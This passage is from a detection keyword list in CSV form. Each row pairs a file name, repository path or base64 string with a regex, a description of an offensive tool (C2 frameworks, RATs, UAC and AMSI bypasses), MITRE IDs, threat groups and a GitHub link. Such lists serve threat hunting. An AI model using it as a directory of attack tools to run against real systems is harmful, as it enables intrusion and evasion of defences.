"*twittor.py*",".{0,1000}twittor\.py.{0,1000}","offensive_tool_keyword","twittor","A fully featured backdoor that uses Twitter as a C&C server ","T1105 - T1102 - T1041","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/PaulSec/twittor","1","1","N/A","N/A","10","10","771","217","2020-09-30T13:47:31Z","2015-09-09T07:23:25Z","61746"
"*twittor-master.zip*",".{0,1000}twittor\-master\.zip.{0,1000}","offensive_tool_keyword","twittor","A fully featured backdoor that uses Twitter as a C&C server ","T1105 - T1102 - T1041","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/PaulSec/twittor","1","1","N/A","N/A","10","10","771","217","2020-09-30T13:47:31Z","2015-09-09T07:23:25Z","61747"
"*TWV0YXNwbG9pdCBSUEMgTG9hZGVy*",".{0,1000}TWV0YXNwbG9pdCBSUEMgTG9hZGVy.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","0","#base64","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","61748"
"*Tycx2ry/SweetPotato*",".{0,1000}Tycx2ry\/SweetPotato.{0,1000}","offensive_tool_keyword","cobaltstrike","Modified SweetPotato to work with CobaltStrike v4.0","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Tycx2ry/SweetPotato_CS","1","1","N/A","N/A","10","10","241","48","2020-04-30T14:27:20Z","2020-04-16T08:01:31Z","61749"
"*tylerdotrar/SigmaPotato*",".{0,1000}tylerdotrar\/SigmaPotato.{0,1000}","offensive_tool_keyword","SigmaPotato","SeImpersonate privilege escalation tool","T1134 - T1055 - T1543","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/tylerdotrar/SigmaPotato","1","1","N/A","N/A","9","4","326","38","2024-05-16T23:46:04Z","2023-09-09T01:35:42Z","61750"
"*Tylous/Ivy*",".{0,1000}Tylous\/Ivy.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/optiv/Ivy","1","1","N/A","N/A","10","8","744","129","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z","61751"
"*Tylous/SourcePoint*",".{0,1000}Tylous\/SourcePoint.{0,1000}","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","N/A","10","10","1109","156","2025-04-16T17:15:04Z","2021-08-06T20:55:26Z","61752"
"*Tylous/ZipExec*",".{0,1000}Tylous\/ZipExec.{0,1000}","offensive_tool_keyword","ZipExec","A unique technique to execute binaries from a password protected zip","T1560.001 - T1204.002 - T1059.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Tylous/ZipExec","1","1","N/A","N/A","9","10","1026","153","2022-07-01T16:25:26Z","2021-10-19T21:03:44Z","61753"
"*TypeError/domained*",".{0,1000}TypeError\/domained.{0,1000}","offensive_tool_keyword","domained","A domain name enumeration tool","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0004","N/A","N/A","Reconnaissance","https://github.com/TypeError/domained","1","1","N/A","N/A","N/A","8","726","157","2021-04-11T09:54:50Z","2017-08-18T00:03:39Z","61754"
"*Tztufn/Nbobhfnfou/Bvupnbujpo/BntjVujmt*",".{0,1000}Tztufn\/Nbobhfnfou\/Bvupnbujpo\/BntjVujmt.{0,1000}","offensive_tool_keyword","AmsiBypass","bypassing Anti-Malware Scanning Interface (AMSI) features","T1548.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell","1","0","N/A","N/A","10","10","1890","311","2024-11-28T10:31:15Z","2019-05-14T06:09:25Z","61756"
"*-u SSARedTeam:s3cr3t*",".{0,1000}\-u\sSSARedTeam\:s3cr3t.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","61757"
"*U2h1dGRvd24gL2wgL2Y=*",".{0,1000}U2h1dGRvd24gL2wgL2Y\=.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#base64","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","61758"
"*U2h1dGRvd24gL3IgL2YgL3QgMDA=*",".{0,1000}U2h1dGRvd24gL3IgL2YgL3QgMDA\=.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#base64","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","61759"
"*U2h1dGRvd24gL3MgL2YgL3QgMDA=*",".{0,1000}U2h1dGRvd24gL3MgL2YgL3QgMDA\=.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#base64","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","61760"
"*U2hlbGxjb2RlIFBhdGg=*",".{0,1000}U2hlbGxjb2RlIFBhdGg\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","61761"
"*U2VhdGJlbHQuZXhl*",".{0,1000}U2VhdGJlbHQuZXhl.{0,1000}","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Flangvik/NetLoader","1","0","N/A","N/A","10","9","820","147","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z","61762"
"*U2VtaW5vbGVzd291bGRkZXN0cm95cGVubnN0YXRl*",".{0,1000}U2VtaW5vbGVzd291bGRkZXN0cm95cGVubnN0YXRl.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","61763"
"*U3dpdGNoIChvciByZWluaXQpIHRvIExTQVNTIHByb2Nlc3MgIGNvbnRleHQ=*",".{0,1000}U3dpdGNoIChvciByZWluaXQpIHRvIExTQVNTIHByb2Nlc3MgIGNvbnRleHQ\=.{0,1000}","offensive_tool_keyword","BetterSafetyKatz","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#base64","BetterSafetyKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","61764"
"*U3dpdGNoIChvciByZWluaXQpIHRvIExTQVNTIHByb2Nlc3MgIGNvbnRleHQ=*",".{0,1000}U3dpdGNoIChvciByZWluaXQpIHRvIExTQVNTIHByb2Nlc3MgIGNvbnRleHQ\=.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#base64","BetterSafetyKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","61765"
"*U3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNNYW5hZ2VkCg==*",".{0,1000}U3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNNYW5hZ2VkCg\=\=.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","#base64","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","61766"
"*uac fodhelper *",".{0,1000}uac\sfodhelper\s.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","61767"
"*uac sdclt *",".{0,1000}uac\ssdclt\s.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","61768"
"*uac_bypass*",".{0,1000}uac_bypass.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","61769"
"*uac_bypass_bluetooth_win10.lua*",".{0,1000}uac_bypass_bluetooth_win10\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059  - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hackerhouse-opensource/OffensiveLua","1","1","N/A","N/A","8","2","184","25","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z","61770"
"*uac_easinvoker.*",".{0,1000}uac_easinvoker\..{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","N/A","4","368","45","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z","61771"
"*UACBypass -*",".{0,1000}UACBypass\s\-.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","61772"
"*UAC-bypass*",".{0,1000}UAC\-bypass.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools ","Earth Lusca Operations Tools and commands","T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090","TA0007 - TA0008","N/A","Earth Lusca - Black Basta","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1","1","0","N/A","N/A","10","","N/A","","","","61773"
"*Uacbypass.dll*",".{0,1000}Uacbypass\.dll.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","1","N/A","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","61774"
"*UACBypass.My*",".{0,1000}UACBypass\.My.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","N/A","10","","N/A","","","","61775"
"*uacbypass_files*",".{0,1000}uacbypass_files.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","N/A","4","368","45","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z","61776"
"*UACBypass-BOF*",".{0,1000}UACBypass\-BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/netero1010/TrustedPath-UACBypass-BOF","1","1","N/A","N/A","10","10","133","40","2021-08-16T07:49:55Z","2021-08-07T03:40:33Z","61777"
"*UACBypassCMSTP.ps1*",".{0,1000}UACBypassCMSTP\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","61778"
"*UACBypassConfig.java*",".{0,1000}UACBypassConfig\.java.{0,1000}","offensive_tool_keyword","lnk2pwn","Malicious Shortcut(.lnk) Generator","T1204 - T1059.007","TA0001 - TA0002","N/A","N/A","Phishing","https://github.com/it-gorillaz/lnk2pwn","1","0","N/A","N/A","8","2","193","34","2018-11-23T17:18:49Z","2018-11-23T00:12:48Z","61779"
"*UACBypassedService*",".{0,1000}UACBypassedService.{0,1000}","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","0","N/A","N/A","8","5","496","62","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z","61780"
"*UACBypassedService.exe*",".{0,1000}UACBypassedService\.exe.{0,1000}","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","1","N/A","N/A","8","1","97","17","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z","61781"
"*UACBypassExecuteCMDAsync.py*",".{0,1000}UACBypassExecuteCMDAsync\.py.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","1","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","61782"
"*UACBypassTest.txt*",".{0,1000}UACBypassTest\.txt.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","0","N/A","N/A","10","10","91","20","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z","61783"
"*UACEnum.SCR*",".{0,1000}UACEnum\.SCR.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","61784"
"*uacm4gic*",".{0,1000}uacm4gic.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","61785"
"*UACME-master*",".{0,1000}UACME\-master.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0005 - TA0004","N/A","Evilnum","Defense Evasion","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","10","6711","1348","2025-03-09T03:33:26Z","2015-03-28T12:04:33Z","61786"
"*uac-schtasks *",".{0,1000}uac\-schtasks\s.{0,1000}","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - 